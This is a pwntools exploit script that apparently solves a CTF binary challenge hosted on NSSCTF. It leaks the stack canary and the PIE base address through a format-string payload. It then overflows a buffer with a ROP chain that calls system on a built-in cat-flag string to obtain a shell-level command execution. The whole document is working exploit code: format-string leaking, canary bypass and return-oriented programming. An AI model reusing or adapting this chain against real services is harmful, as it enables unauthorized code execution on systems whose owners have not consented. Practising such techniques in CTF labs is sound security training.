1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
| from pwn import *
import sys
pty = process.PTY
context(os='linux', log_level='debug')
mode = sys.argv[1] if len(sys.argv) > 1 else ''
if mode == 'r':
proc = remote("node4.anna.nssctf.cn", 28372)
else:
proc = process("./bin", stdin=pty, stdout=pty)
belf = ELF("./bin")
def s(x): proc.send(x)
def sl(x): return proc.sendline(x)
def sd(x): return proc.send(x)
def sla(x, y): return proc.sendlineafter(x, y)
def sa(x, y): return proc.sendafter(x, y)
def ru(x): return proc.recvuntil(x)
def rc(x=0xfffffff): return proc.recv(x)
def rl(): return proc.recvline()
def li(con): return log.info(con)
def ls(con): return log.success(con)
def pi(): return proc.interactive()
def pcls(): return proc.close()
def ga(): return u64(ru(b'\x7f')[-6:].ljust(8, b'\x00'))
gscript = '''
b main
fin
fin
fin
fin
ni 80
'''
if mode == 'd':
gdb.attach(proc, gdbscript=gscript)
sla(b'name? ', b'%p '*0x13)
ru(b', ')
t = ru(b'!\n').decode().split(' ')
print(t)
canary = int(t[-4], 16)
base = int(t[-2], 16)-0x146f
catflag_addr = base+0x2004
system_plt = base+belf.plt['system']
rdi_ret = base+0x00000000000014e3
ret = base+0x000000000000101a
ls("canary: "+hex(canary))
ls("catflag_addr: "+hex(catflag_addr))
sl(b'h'*0x38 + p64(canary)+b'h'*8+p64(ret) +
p64(rdi_ret)+p64(catflag_addr)+p64(system_plt))
pi()
pause()
|
